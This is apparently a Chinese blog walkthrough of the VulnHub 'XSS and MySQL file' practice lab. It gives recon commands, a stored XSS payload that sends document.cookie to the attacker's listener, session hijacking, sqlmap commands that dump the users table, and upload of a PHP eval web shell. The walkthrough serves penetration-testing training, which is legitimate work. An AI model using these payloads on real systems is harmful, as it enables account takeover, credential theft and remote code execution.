XSS_and_Mysql_file靶场攻略

下载地址

https://download.vulnhub.com/pentesterlab/xss_and_mysql_file.iso

扫描ip

复制代码
arp-scan -l 

扫描端口

复制代码
nmap -sS -sV -p- 192.168.89.137

扫描目录

复制代码
dirsearch -u 192.168.89.137

访问80端口,点击测试

测试漏洞位置

复制代码
<script>alert(1)</script>

设置存储型xss,kali监听

复制代码
<script>document.write('<img src="http://192.168.89.137:8080/?' + document.cookie +'"/>');</script>
复制代码
python -m http.server 8080

一分钟左右会有cookie回显

登录admin

点击admin,随便输入账号密码抓包

修改cookie为kali监听到的,放行后可登录

点击edit,使用sqlmap注入

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --dbs --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' --tables --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' -T 'users' --dump --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

得到账号密码

蚁剑shell

在kali创建一个php文件

复制代码
vim 1.php

<?php @eval($_POST['123456']);?>

使用sqlmap将文件放到网站

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4" --file-write /home/kali/1.php --file-dest /var/www/css/1.php

使用蚁剑连接

相关推荐
SVIP1115911 小时前
即时通讯WebSocket详解及使用方法
前端·javascript
mCell15 小时前
使用 useSearchParams 同步 URL 和查询参数
前端·javascript·react.js
mCell17 小时前
前端路由详解:Hash vs History
前端·javascript·vue-router
海上彼尚17 小时前
无需绑卡的海外地图
前端·javascript·vue.js·node.js
1024肥宅17 小时前
手写 call、apply、bind 的实现
前端·javascript·ecmascript 6
科杰智能制造18 小时前
纯前端html、js实现人脸检测和表情检测,可直接在浏览器使用
前端·javascript·html
每天吃饭的羊18 小时前
组件库的有些点击事件是name-click这是如何分装de
前端·javascript·vue.js
x***010618 小时前
SpringSecurity+jwt实现权限认证功能
android·前端·后端
1024肥宅18 小时前
防抖(Debounce)
前端·javascript·ecmascript 6
1024肥宅18 小时前
节流(Throttle)
前端·javascript·ecmascript 6